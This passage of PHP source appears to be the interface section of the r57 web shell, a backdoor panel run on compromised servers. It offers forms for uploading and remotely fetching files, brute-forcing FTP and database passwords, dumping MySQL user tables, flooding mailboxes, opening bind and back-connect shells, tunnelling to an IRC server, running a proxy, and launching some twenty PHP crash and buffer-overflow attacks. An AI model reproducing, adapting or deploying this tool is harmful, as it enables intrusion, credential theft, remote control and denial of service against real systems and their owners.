2246 echo "<tr><td valign=top width=70%>".$ts;
2247 echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
2248 echo $te."</td><td valign=top width=30%>".$ts;
2249 echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
2250 echo $te."</td></tr>";
2251 echo $te.'</div>'.$table_end1;
2252 } if((!@function_exists('ini_get')) ||@ini_get('file_uploads')){ echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
2253 echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts;
2254 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,''));
2255 echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2256 echo $te.'</div>'.$table_end1.$fe;
2257 } if((!@function_exists('ini_get')) ||@ini_get('file_uploads')){ echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
2258 echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts;
2259 echo "<tr><td valign=top width=50%>".$ts;
2260 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,''));
2261 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,''));
2262 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,''));
2263 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,''));
2264 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,''));
2265 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,''));
2266 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,''));
2267 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,''));
2268 echo $te."</td><td valign=top width=50%>".$ts;
2269 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,''));
2270 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,''));
2271 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,''));
2272 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,''));
2273 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,''));
2274 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,''));
2275 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,''));
2276 echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2277 echo $te."</td></tr>";
2278 echo $te.'</div>'.$table_end1.$fe;
2279 } $select='';
2280 if((!@function_exists('ini_get')) ||(@ini_get('allow_url_fopen') &&@function_exists('fopen'))){$select = "<option value=\"fopen\">fopen</option>";
2281} if(!$safe_mode){ if(which('wget')){$select .= "<option value=\"wget\">wget</option>";
2282} if(which('fetch')){$select .= "<option value=\"fetch\">fetch</option>";
2283} if(which('lynx')){$select .= "<option value=\"lynx\">lynx</option>";
2284} if(which('links')){$select .= "<option value=\"links\">links</option>";
2285} if(which('curl')){$select .= "<option value=\"curl\">curl</option>";
2286} if(which('GET')){$select .= "<option value=\"GET\">GET</option>";
2287} } if($select){ echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts;
2288 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\">".$select ."</select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
2289 echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2290 echo $te.'</div>'.$table_end1.$fe;
2291 } echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts;
2292 echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
2293 $arh = $lang[$language.'_text92'];
2294 if(@function_exists('gzcompress')) {$arh .= in('radio','compress',0,'zip').' zip';
2295} if(@function_exists('gzencode')) {$arh .= in('radio','compress',0,'gzip').' gzip';
2296} if(@function_exists('bzcompress')) {$arh .= in('radio','compress',0,'bzip').' bzip';
2297} echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
2298 echo $te.'</div>'.$table_end1.$fe;
2299 if(@function_exists("ftp_connect")){ echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
2300 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>";
2301 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir));
2302 echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
2303 echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
2304 echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
2305 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root"))));
2306 echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passw.dic'))));
2307 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1']));
2308 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2309 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
2310 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2311 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2312 echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2313 echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
2314 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
2315 echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2316 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
2317 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2318 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
2319 echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2320 echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2321 echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2322 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
2323 echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
2324 echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2325 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
2326 echo $te."</td>".$fe."</tr></div></table>";
2327 } if(@function_exists("mail")){ echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
2328 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
2329 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):(""))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
2330 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):(""))));
2331 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):(""))));
2332 echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
2333 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2334 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2335 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
2336 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):(""))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
2337 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):(""))));
2338 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):(""))));
2339 echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir));
2340 echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
2341 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2342 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2343 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>";
2344 echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir));
2345 echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2346 echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
2347 echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>');
2348 echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10)));
2349 echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2350 echo $te."</td>".$fe."</tr></div></table>";
2351 } if($mysql_on||$mssql_on||$pg_on||$ora_on) { $select = '<select name=db>';
2352 if($mysql_on) $select .= '<option>MySQL</option>';
2353 if($mssql_on) $select .= '<option>MSSQL</option>';
2354 if($pg_on) $select .= '<option>PostgreSQL</option>';
2355 if($ora_on) $select .= '<option>Oracle</option>';
2356 $select .= '</select>';
2357 echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up2.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
2358 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>";
2359 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute'));
2360 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2361 echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
2362 echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
2363 echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
2364 echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
2365 echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
2366 echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passw.dic'))));
2367 echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1']));
2368 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2369 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
2370 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2371 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2372 echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2373 echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
2374 echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
2375 echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
2376 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2377 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
2378 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2379 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2380 echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2381 echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
2382 echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
2383 echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;
2384\nSHOW TABLES;
2385\nSELECT * FROM user;
2386\nSELECT version();
2387\nSELECT user();
2388"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>";
2389 echo "</td>".$fe."</tr></div></table>";
2390 } if(!$safe_mode &&$unix){ echo $table_up1.div_title($lang[$language.'_text81'],'id37').$table_up2.div('id37').$ts."<tr>".$fs."<td valign=top width=25%>".$ts;
2391 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
2392 echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457'));
2393 echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57'));
2394 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2395 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
2396 echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
2397 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
2398 echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ?(getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
2399 echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
2400 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2401 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
2402 echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
2403 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
2404 echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457'));
2405 echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru'));
2406 echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667'));
2407 echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
2408 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
2409 echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
2410 echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";
2411 echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337'));
2412 echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
2413 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
2414 echo $te."</td>".$fe."</tr></div></table>";
2415 } echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=50%>".$ts;
2416 echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
2417 echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe);
2418 echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit exhaustion in [ pack() ] function').$fe);
2419 echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF in [ unserialize() ] function').$fe);
2420 echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'Limit integer calculate (65535) in ZendEngine').$fe);
2421 echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [ dl() ] vulnerability').$fe);
2422 echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [ preg_match() ] exhaustion resources (PHP <5.2.1)').$fe);
2423 echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Memory_limit exhaustion in [ str_repeat() ] function (PHP <4.4.5,5.2.1)').$fe);
2424 echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe);
2425 echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload inodes from HD.I via [ tempnam() ] (PHP 4.4.2, 5.1.2)').$fe);
2426 echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF in [ wordwrap() ] function (PHP <4.4.2,5.1.2)').$fe);
2427 echo $te."</td><td valign=top width=50%>".$ts;
2428 echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
2429 echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF in [ array_fill() ] function (PHP <4.4.2,5.1.2)').$fe);
2430 echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF in [ substr_compare() ] function (PHP <4.4.2,5.1.2)').$fe);
2431 echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Array Creation in [ unserialize() ] 64 bit function (PHP <5.2.1)').$fe);
2432 echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF in [ str_ireplace() ] function (PHP <5.2.x)').$fe);
2433 echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF in [ htmlentities() ] function (PHP <5.1.6,4.4.4)').$fe);
2434 echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'Integer Overflow in [ zip_entry_read() ] function (PHP <4.4.5)').$fe);
2435 echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF in [ sqlite_udf_decode_binary() ] function (PHP <4.4.5,5.2.1)').$fe);
2436 echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'Memory Allocation BoF in [ msg_receive() ] function (PHP <4.4.5,5.2.1)').$fe);
2437 echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'Off By One in [ php_stream_filter_create() ] function (PHP 5<5.2.1)').$fe);
2438 echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'Reference Counter Overflow in [ unserialize() ] function (PHP <4.4.4)').$fe);
2439 echo $te."</td></tr></div></table>";
2440 ?>